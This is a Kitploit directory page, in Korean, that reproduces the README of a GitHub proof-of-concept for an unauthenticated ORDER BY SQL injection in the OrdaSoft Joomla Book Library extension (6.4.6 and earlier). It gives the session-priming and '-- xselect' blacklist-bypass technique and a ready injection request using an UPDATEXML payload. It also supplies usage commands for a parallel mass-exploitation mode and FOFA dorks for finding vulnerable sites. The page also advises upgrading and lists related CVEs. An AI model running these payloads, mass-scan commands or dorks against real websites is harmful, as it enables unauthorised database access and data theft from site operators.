Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/murrez/cve-2026-101110
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-101110

CVE-2026-101110

CVE-2026-101110에 대한 Python 3 PoC 및 대량 익스플로잇으로, OrdaSoft Joomla Book Library <=6.4.6에서 field/direction 파라미터를 통한 인증되지 않은 ORDER BY SQL 인젝션입니다.

4일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2026-101110 — OrdaSoft Book Library (Free) 인증되지 않은 SQL 인젝션

Joomla ≤ 6.4.6용 OrdaSoft **Book Library (Free)**에 대한 CVE-2026-101110 Python 3 PoC입니다. **6.4.7+**로 업그레이드하세요.

PoCbithttps://pocbit.org/pocs/cve-2026-101110
Cataloghttps://pocbit.org/pocs/
Componentcom_booklibrary
File / functionsite/booklibrary.php → books()
Parametersfield, direction (정렬)
Auth없음 (공개 도서 목록)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critical (Joomla CNA)
CreditAla Arfaoui

취약점 요약 (Türkçe)

**Book Library (Free)**는 Joomla에서 도서 라이브러리 / 카테고리 목록을 제공하는 OrdaSoft 확장 기능입니다. 6.4.6 및 이전 버전에서 books() 함수는 field 및 direction 매개변수를 protectInjectionWithoutQuote() 로 필터링합니다. 이 함수는 select 하위 문자열만 검색하는 취약한 블랙리스트를 적용하며, 발견 시 값을 $db->quote() 로 감쌀 뿐 거부하지 않습니다.

값은 이후 따옴표 없는 ORDER BY 절에 추가됩니다 — 여기서 quote를 사용하는 것은 SQL 인젝션을 막지 못합니다 (CNA 설명).

익스플로잇을 위한 두 가지 조건:

  1. 세션 프라이밍: 첫 번째 요청이 세션에 저장된 기본 정렬(field / direction) 값을 기록합니다.
  2. 블랙리스트 우회: 두 번째 요청에서 페이로드 끝에 -- xselect decoy 주석을 추가합니다. 블랙리스트 검사를 통과하고, SQL 주석은 나머지 페이로드에 영향을 주지 않습니다.

결과: 인증 없이 ORDER BY SQLi, 데이터베이스 읽기/쓰기 및 사이트 무결성 측면에서 심각한 위험.


기술적 메커니즘

Request 1 (prime):  ...&field=title&direction=ASC   → session sort defaults
Request 2 (inject): ...&field=<expr> -- xselect&direction=ASC
                      └─ concatenated into ORDER BY (unquoted)

취약한 필터 (개념적):

  • 입력에 select (하위 문자열) 포함 → 전체 값을 따옴표로 감쌈 (ORDER BY 컨텍스트에서는 무의미).
  • 공격자는 -- xselect 를 추가하여 블랙리스트가 주석 꼬리 안의 select 를 보게 하는 반면, -- 앞의 활성 표현식은 실행 가능한 SQL로 남습니다 (error-based / UPDATEXML / stacked ORDER BY 기법).

PoC 구현:

단계동작
Fingerprintcom_booklibrary 경로 + 선택적 manifest 버전
Route discoveryshowCategory, search, showBooks, books, … + 스크래핑된 catid / Itemid
check세션 프라이밍 → SQLi 확인 (flag / VERSION())
exploit프라이밍 → --subquery 추출 (기본값 SELECT VERSION())
mass--list + -j 병렬 대상; 성공적 유출 시 exploited.txt

코드 내 페이로드 접미사 상수: -- xselect (BLACKLIST_DECOY).


요구 사항

cd CVE-2026-101110
pip install -r requirements.txt

사용법

단일 대상

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"

대량 일괄 처리 (exploit 우선 워크플로)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 12 --subquery "SELECT VERSION()" --exploited-list exploited.txt
플래그의미
--aggressiveCheck 모드에서 프라이밍 후 버전 유출 시도
--subqueryUPDATEXML / double-query 페이로드용 내부 표현식
--exploited-list탭으로 구분된 성공적 추출 결과
--no-colorANSI 비활성화 (NO_COLOR 도 가능)

JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component, session_primed.


HTTP 예시

프라이밍 (세션):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=title&direction=ASC HTTP/1.1

인젝션 (PoC가 decoy 추가):

GET /index.php?option=com_booklibrary&task=showCategory&catid=1&field=UPDATEXML(1,CONCAT(0x7e,(VERSION()),0x7e),1) -- xselect&direction=ASC HTTP/1.1

GET이 실패하면 동일한 라우트에서 POST 변형을 시도합니다.


버전 탐지

Manifest (노출된 경우):

  • /administrator/components/com_booklibrary/booklibrary.xml

≤ 6.4.6 → 취약한 라인; ≥ 6.4.7 → 패치됨 (check 출력의 patched_version).


FOFA dorks

body="option=com_booklibrary"
body="/components/com_booklibrary/" && body="Joomla"
body="com_booklibrary" && (body="booklibrary" || body="Book Library")
body="ordasoft" && body="booklibrary"

관련 OrdaSoft CVE (2026년 9월)

CVE확장 기능문제수정 버전
CVE-2026-101110Book LibraryORDER BY SQLi + 블랙리스트 우회6.4.7
CVE-2026-101111Book Library반사형 XSS (title 매개변수)6.4.7
CVE-2026-101108Vehicle ManagerORDER BY SQLi6.5.8
CVE-2026-100752Real Estate ManagerORDER BY SQLi6.7.9

배포한 모든 OrdaSoft 컴포넌트를 패치하세요.


참고 자료

  • PoCbit CVE-2026-101110
  • CVE.report CVE-2026-101110
  • OrdaSoft
  • 과거 사례: search/lend 작업의 이전 com_booklibrary SQLi (CVE-2010-1522) — 다른 코드 경로

법적 고지

승인된 테스트 및 패치 검증 전용입니다.


GitHub 저장소 설명

CVE-2026-101110 PoC: OrdaSoft Joomla Book Library (Free) <=6.4.6 unauth SQLi — field/direction ORDER BY, session prime + `-- xselect` blacklist bypass (com_booklibrary). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101110
도구 다운로드